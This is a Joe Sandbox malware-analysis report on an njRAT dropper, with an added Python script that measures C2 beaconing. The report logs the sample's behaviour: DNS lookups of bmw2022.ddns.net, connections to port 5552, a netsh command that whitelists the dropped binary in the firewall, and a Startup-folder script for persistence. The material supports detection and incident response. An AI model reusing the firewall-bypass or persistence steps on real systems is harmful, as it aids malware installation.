                                                                                                                                                                  Nov 3, 2023 18:56:24.661406994 CET497925552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:24.925406933 CET555249792156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:25.552011967 CET497925552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:25.819108009 CET555249792156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:26.085293055 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:26.357989073 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:26.895775080 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:27.213304043 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:27.895893097 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:28.170495987 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:28.692811966 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:28.965643883 CET555249793156.196.162.149192.168.2.4
                                                                                                                                                                  Nov 3, 2023 18:56:29.474061012 CET497935552192.168.2.4156.196.162.149
                                                                                                                                                                  Nov 3, 2023 18:56:29.747740984 CET555249793156.196.162.149192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 3, 2023 18:52:33.519340992 CET | 53416 | 53 | 192.168.2.4 | 1.1.1.1
Nov 3, 2023 18:52:33.615197897 CET | 53 | 53416 | 1.1.1.1 | 192.168.2.4
Nov 3, 2023 18:53:34.524842024 CET | 59827 | 53 | 192.168.2.4 | 1.1.1.1
Nov 3, 2023 18:53:34.619623899 CET | 53 | 59827 | 1.1.1.1 | 192.168.2.4
Nov 3, 2023 18:54:38.975713015 CET | 61347 | 53 | 192.168.2.4 | 1.1.1.1
Nov 3, 2023 18:54:39.072300911 CET | 53 | 61347 | 1.1.1.1 | 192.168.2.4
Nov 3, 2023 18:55:38.475537062 CET | 58368 | 53 | 192.168.2.4 | 1.1.1.1
Nov 3, 2023 18:55:38.574671030 CET | 53 | 58368 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 3, 2023 18:52:33.519340992 CET | 192.168.2.4 | 1.1.1.1 | 0x7ddd | Standard query (0) | bmw2022.ddns.net | A (IP address) | IN (0x0001) | false
Nov 3, 2023 18:53:34.524842024 CET | 192.168.2.4 | 1.1.1.1 | 0xd791 | Standard query (0) | bmw2022.ddns.net | A (IP address) | IN (0x0001) | false
Nov 3, 2023 18:54:38.975713015 CET | 192.168.2.4 | 1.1.1.1 | 0xda9d | Standard query (0) | bmw2022.ddns.net | A (IP address) | IN (0x0001) | false
Nov 3, 2023 18:55:38.475537062 CET | 192.168.2.4 | 1.1.1.1 | 0xd938 | Standard query (0) | bmw2022.ddns.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 3, 2023 18:52:33.615197897 CET | 1.1.1.1 | 192.168.2.4 | 0x7ddd | No error (0) | bmw2022.ddns.net | | 156.196.162.149 | A (IP address) | IN (0x0001) | false
Nov 3, 2023 18:53:34.619623899 CET | 1.1.1.1 | 192.168.2.4 | 0xd791 | No error (0) | bmw2022.ddns.net | | 156.196.162.149 | A (IP address) | IN (0x0001) | false
Nov 3, 2023 18:54:39.072300911 CET | 1.1.1.1 | 192.168.2.4 | 0xda9d | No error (0) | bmw2022.ddns.net | | 156.196.162.149 | A (IP address) | IN (0x0001) | false
Nov 3, 2023 18:55:38.574671030 CET | 1.1.1.1 | 192.168.2.4 | 0xd938 | No error (0) | bmw2022.ddns.net | | 156.196.162.149 | A (IP address) | IN (0x0001) | false
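
The packet tables above show the two things a responder wants from this capture: the implant resolves bmw2022.ddns.net roughly once a minute and holds a TCP session to 156.196.162.149:5552 that it tears down and re-opens on a fresh client port every few packets. The following script is an added example (not part of the Joe Sandbox report): it parses a handful of the report's own TCP rows exactly as the extraction fused them, recovers the fields from two facts visible on the page (the C2 port is 5552, and the client ports fall in the Windows dynamic range, so they are always five digits), then measures the inter-arrival jitter of client-to-C2 packets. The 25% jitter threshold and the "dropper directory" idea are assumptions for illustration, not something the report states.

```python
"""Beacon profiling over the fused packet rows of the sandbox report (added example)."""
from __future__ import annotations

import re
from datetime import datetime
from statistics import mean, pstdev

C2_PORT = 5552                 # njRAT listener port recorded in the report
SANDBOX_HOST = "192.168.2.4"   # analysis VM address recorded in the report

# Constructed sample: twelve TCP rows copied from the report, fused exactly as extracted.
RAW_ROWS = """\
Nov 3, 2023 18:56:02.791109085 CET555249787156.196.162.149192.168.2.4
Nov 3, 2023 18:56:03.364507914 CET497875552192.168.2.4156.196.162.149
Nov 3, 2023 18:56:03.866995096 CET555249787156.196.162.149192.168.2.4
Nov 3, 2023 18:56:04.458268881 CET497875552192.168.2.4156.196.162.149
Nov 3, 2023 18:56:04.934912920 CET555249787156.196.162.149192.168.2.4
Nov 3, 2023 18:56:05.304852009 CET497885552192.168.2.4156.196.162.149
Nov 3, 2023 18:56:05.950715065 CET555249788156.196.162.149192.168.2.4
Nov 3, 2023 18:56:06.489537001 CET497885552192.168.2.4156.196.162.149
Nov 3, 2023 18:56:07.020143032 CET555249788156.196.162.149192.168.2.4
Nov 3, 2023 18:56:07.583265066 CET497885552192.168.2.4156.196.162.149
Nov 3, 2023 18:56:07.946619034 CET555249788156.196.162.149192.168.2.4
Nov 3, 2023 18:56:08.583329916 CET497885552192.168.2.4156.196.162.149
"""

# The port pair is either '<C2 port><5-digit ephemeral>' or '<5-digit ephemeral><C2 port>'.
ROW_RE = re.compile(
    rf"^(?P<ts>.+?) CET(?P<ports>{C2_PORT}\d{{5}}|\d{{5}}{C2_PORT})(?P<ips>\d[\d.]+)$"
)
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_RE = re.compile(rf"^{OCTET}(?:\.{OCTET}){{3}}$")


def split_ports(ports: str) -> tuple[int, int]:
    """'555249787' -> (5552, 49787); '497875552' -> (49787, 5552)."""
    c2 = str(C2_PORT)
    if ports.startswith(c2):
        return C2_PORT, int(ports[len(c2):])
    return int(ports[:5]), C2_PORT


def ip_splits(fused: str) -> list[tuple[str, str]]:
    """Every position at which the fused string splits into two valid dotted quads."""
    return [(fused[:i], fused[i:]) for i in range(1, len(fused))
            if IPV4_RE.match(fused[:i]) and IPV4_RE.match(fused[i:])]


def parse_rows(raw: str) -> list[dict]:
    """Recover timestamp, ports and IPs. IPs are resolved in two passes: rows with a
    single valid split define the hosts in the capture; ambiguous rows (e.g.
    '192.168.2.4156...' could also be '192.168.2.41' + '56...') then keep the split
    whose halves are both known hosts."""
    rows = []
    for line in raw.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        head, frac = m["ts"].rsplit(".", 1)          # strptime takes at most 6 fractional digits
        ts = datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")
        sport, dport = split_ports(m["ports"])
        rows.append({"ts": ts, "sport": sport, "dport": dport, "cands": ip_splits(m["ips"])})
    known = {ip for r in rows if len(r["cands"]) == 1 for ip in r["cands"][0]}
    for r in rows:
        picks = [c for c in r["cands"] if set(c) <= known]
        if len(picks) != 1:
            raise ValueError(f"cannot resolve IP pair for row at {r['ts']}")
        r["src"], r["dst"] = picks[0]
        del r["cands"]
    return rows


def beacon_profile(rows: list[dict]) -> dict:
    """Inter-arrival statistics of sandbox-to-C2 packets plus the number of distinct
    client connections (one ephemeral port per reconnect)."""
    to_c2 = [r for r in rows if r["src"] == SANDBOX_HOST and r["dport"] == C2_PORT]
    times = sorted(r["ts"] for r in to_c2)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    avg = mean(gaps)
    return {
        "packets_to_c2": len(times),
        "connections": len({r["sport"] for r in to_c2}),
        "mean_gap_s": round(avg, 3),
        "jitter": round(pstdev(gaps) / avg, 3),   # coefficient of variation
    }


def is_periodic_beacon(profile: dict, max_jitter: float = 0.25, min_packets: int = 5) -> bool:
    """Assumed heuristic: enough packets at a near-constant interval look like a beacon."""
    return profile["packets_to_c2"] >= min_packets and profile["jitter"] <= max_jitter


if __name__ == "__main__":
    prof = beacon_profile(parse_rows(RAW_ROWS))
    print(prof, "-> periodic beacon" if is_periodic_beacon(prof) else "-> irregular")
```

On the twelve rows above the client sends to port 5552 about once a second with roughly 10% jitter across two reconnects, which is the pattern the full table continues for the rest of the capture; run against a real flow log the same profile function would be fed by a proper parser rather than by the fused-row recovery, which only exists because the report lost its delimiters.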

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:18:52:19
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Users\user\Desktop\ESjy0irMIn.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Users\user\Desktop\ESjy0irMIn.exe
                                                                                                                                                                  Imagebase:0x150000
                                                                                                                                                                  File size:1'078'272 bytes
                                                                                                                                                                  MD5 hash:536018D01EE05BC37064C480178E2BF8
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:18:52:21
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\ProgramData\dotNetFx40_Client_setup.exe"
                                                                                                                                                                  Imagebase:0x10000
                                                                                                                                                                  File size:887'896 bytes
                                                                                                                                                                  MD5 hash:61446FDD76788229D3EBAEABE84DF38C
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Target ID:3
                                                                                                                                                                  Start time:18:52:21
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\ProgramData\essam@sasa2023.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\ProgramData\essam@sasa2023.exe"
                                                                                                                                                                  Imagebase:0x750000
                                                                                                                                                                  File size:176'128 bytes
                                                                                                                                                                  MD5 hash:7266F0DBCD9D7EE7F4618A70D3CB53EE
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                  • Detection: 79%, ReversingLabs
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Target ID:4
                                                                                                                                                                  Start time:18:52:23
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\b53dd3b256ba71dad061693a386e\\Setup.exe /x86 /x64 /ia64 /web
                                                                                                                                                                  Imagebase:0x9a0000
                                                                                                                                                                  File size:78'152 bytes
                                                                                                                                                                  MD5 hash:006F8A615020A4A17F5E63801485DF46
                                                                                                                                                                  Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation: moderate
Has exited: false

Target ID: 5
Start time: 18:52:30
Start date: 03/11/2023
Path: C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit): true
Commandline: netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE
Imagebase: 0x1560000
File size: 82'432 bytes
MD5 hash: 4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 6
Start time: 18:52:30
Start date: 03/11/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 18:52:34
Start date: 03/11/2023
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js"
Imagebase: 0x7ff726ad0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 8
Start time: 18:52:35
Start date: 03/11/2023
Path: C:\ProgramData\essam@sasa2023.exe
Wow64 process (32bit): false
Commandline: "C:\ProgramData\essam@sasa2023.exe"
Imagebase: 0x3c0000
File size: 176'128 bytes
MD5 hash: 7266F0DBCD9D7EE7F4618A70D3CB53EE
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 11
Start time: 18:52:36
Start date: 03/11/2023
Path: C:\ProgramData\essam@sasa2023.exe
Wow64 process (32bit): true
Commandline: "C:\ProgramData\essam@sasa2023.exe"
Imagebase: 0x410000
File size: 176'128 bytes
MD5 hash: 7266F0DBCD9D7EE7F4618A70D3CB53EE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: njrat1, Description: Identify njRat, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
• Rule: Njrat, Description: detect njRAT in memory, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
• Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
• Rule: njrat1, Description: Identify njRat, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
• Rule: Njrat, Description: detect njRAT in memory, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 15
Start time: 18:52:43
Start date: 03/11/2023
Path: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
Imagebase: 0xb40000
File size: 1'620'872 bytes
MD5 hash: 1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 16
Start time: 18:52:47
Start date: 03/11/2023
Path: C:\Windows\splwow64.exe
Wow64 process (32bit): false
Commandline: C:\Windows\splwow64.exe 12288
Imagebase: 0x7ff65bb90000
File size: 163'840 bytes
MD5 hash: 77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

Target ID: 18
Start time: 18:52:47
Start date: 03/11/2023
Path: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtf
Imagebase: 0xb40000
File size: 1'620'872 bytes
MD5 hash: 1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: false

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754038238.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b76d000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 676e2560beae968c5ae35c4ae0cd13da4894114cdc9d83ae632998a978970a76
                                                                                                                                                                    • Instruction ID: 49c9f94b737242f2beeb31bb3588e411e0fd0c5942d2edb4b53acb6751cecc10
                                                                                                                                                                    • Opcode Fuzzy Hash: 676e2560beae968c5ae35c4ae0cd13da4894114cdc9d83ae632998a978970a76
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F512C7150EBC98FE7A69B2C98559523FE0EF56350B1606EFD088CB0B3D624AC45C793
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 473c4579faf145a64b4894f3e1575ebdbbad91c4c99e8113ef7f00b95dff988f
                                                                                                                                                                    • Instruction ID: ee5b54d46c12c91bb2ff871fa421a6a1dc48d33c5187945a40e372a700c2f702
                                                                                                                                                                    • Opcode Fuzzy Hash: 473c4579faf145a64b4894f3e1575ebdbbad91c4c99e8113ef7f00b95dff988f
                                                                                                                                                                    • Instruction Fuzzy Hash: 38412616B0FECA0FE7679BB85835468BF90EF5621470A01FBC499CB0E7DD296E068351
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4c7c1e746802efe86f7b5ba851260f75d497b2bfd10682bad2636c720d18df94
                                                                                                                                                                    • Instruction ID: b9be8bbf342c84886911962cae2438b09fc71424022381a963823a89c230e176
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c7c1e746802efe86f7b5ba851260f75d497b2bfd10682bad2636c720d18df94
                                                                                                                                                                    • Instruction Fuzzy Hash: 35314D72F1EB8E8FE7219B78A8751E83FA0FF45715F1500B7D0A8CA1A3DA3855868750
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e2d0367afdc9c3f478b6477b0a78c0dc5e262c31beb7edc088946c6a87ea276e
                                                                                                                                                                    • Instruction ID: e8083656f7168667813b19a2f42238d43762f455904197352242d7946d4286d7
                                                                                                                                                                    • Opcode Fuzzy Hash: e2d0367afdc9c3f478b6477b0a78c0dc5e262c31beb7edc088946c6a87ea276e
                                                                                                                                                                    • Instruction Fuzzy Hash: 04212631B2EE8A4FD7A9D76898756647BE0EF59310B0A01F7C068C71A6DA2C9D418342
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: eff0f3aa11e1eecdb0cb2a0153005ec420161d72fb284102f7960f81e8901ace
                                                                                                                                                                    • Instruction ID: 18480b79285837827b2b1a62eaae3ca0da3aaec9d2b1282aa74c8901b3469f4f
                                                                                                                                                                    • Opcode Fuzzy Hash: eff0f3aa11e1eecdb0cb2a0153005ec420161d72fb284102f7960f81e8901ace
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B214172E25D0E8FEB98EB98D8A59FCBBB1FF58640B910175D019E31E6DE3469028740
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1f4b0bb7b2bca7cf3eed872516b780ce1d44571c1c851aa9cbd195aadae94534
                                                                                                                                                                    • Instruction ID: 90c017bf45bc6ea7937d695d0c270efe2ea3e8b6c07b6539c3cf5fec38ddedbe
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f4b0bb7b2bca7cf3eed872516b780ce1d44571c1c851aa9cbd195aadae94534
                                                                                                                                                                    • Instruction Fuzzy Hash: A5110452F0FECB5FE75AA3A85876494B791EF5A21470942B7C068CB0A3DD28A8168381
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 519e2b3348780fbb880f7ee0e4f2ff00c2fb8faf558cc0bba7b3cbdfb052cc85
                                                                                                                                                                    • Instruction ID: 3a08ca6f80fa05914a525969551cf780c435977949ac0ef41f4604a8f41782a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 519e2b3348780fbb880f7ee0e4f2ff00c2fb8faf558cc0bba7b3cbdfb052cc85
                                                                                                                                                                    • Instruction Fuzzy Hash: 26012671E1AB8D4FE755AB7858740EC3FA0EF09308F5105BBE06CC60A3DE3455858780
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8bd4c4c84ed074a4cd5d0a9fc02dcbc2c617d8be54c5c8f6b5fc8955f47c9271
                                                                                                                                                                    • Instruction ID: a23fd4070d3698b4968c51be5da5821162cce505496e1809c1fbcc3a59da9404
                                                                                                                                                                    • Opcode Fuzzy Hash: 8bd4c4c84ed074a4cd5d0a9fc02dcbc2c617d8be54c5c8f6b5fc8955f47c9271
                                                                                                                                                                    • Instruction Fuzzy Hash: 00016D31B28D0E4FEBE8EB6C9464A66A3D1FF98710B5445B6D45CC3299EE34EC428740
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: af7b2278c49231616b4b3cb1e719d7b3cd450de85655d1ffabdef329e64da56b
                                                                                                                                                                    • Instruction ID: 6b17dba26f0581f84b0e4e3d716a1be7aed876d01c24afc4f49f1acf3ba02f68
                                                                                                                                                                    • Opcode Fuzzy Hash: af7b2278c49231616b4b3cb1e719d7b3cd450de85655d1ffabdef329e64da56b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF0E91060EBD84FD325877848647D17FE29BA6601F0D45DEC09DC6192D5692448C392
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 437c0f31446c45d4e8b76a859155b5705241654d566a5e3fba75007e178d5011
• Instruction ID: 2ea4729cca9940a2e632136c73d87e9e2fe2d620f143e2bd6fa9cefc6a5e0c25
• Opcode Fuzzy Hash: 437c0f31446c45d4e8b76a859155b5705241654d566a5e3fba75007e178d5011
• Instruction Fuzzy Hash: 24D0A738464A4D8FCB40EF55E4018AA77A5FB88314F400656FC6CC7285D739A6B5C7D1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 516cab7690d809a1f40488d6020b42c604f92897eb0051d94bcb6a147eb899ea
• Instruction ID: b01b17a54aaf86dc2b1c2698dbdbe1548fed55f78f3c5df4501f7d551eb38cdc
• Opcode Fuzzy Hash: 516cab7690d809a1f40488d6020b42c604f92897eb0051d94bcb6a147eb899ea
• Instruction Fuzzy Hash: 02D0C931798C0E9FCB4CE66DE450DD5B3E1EB583617508AAAC01EC3648EA35E8928BC0
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 17.1%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 11.7%
Total number of Nodes: 2000
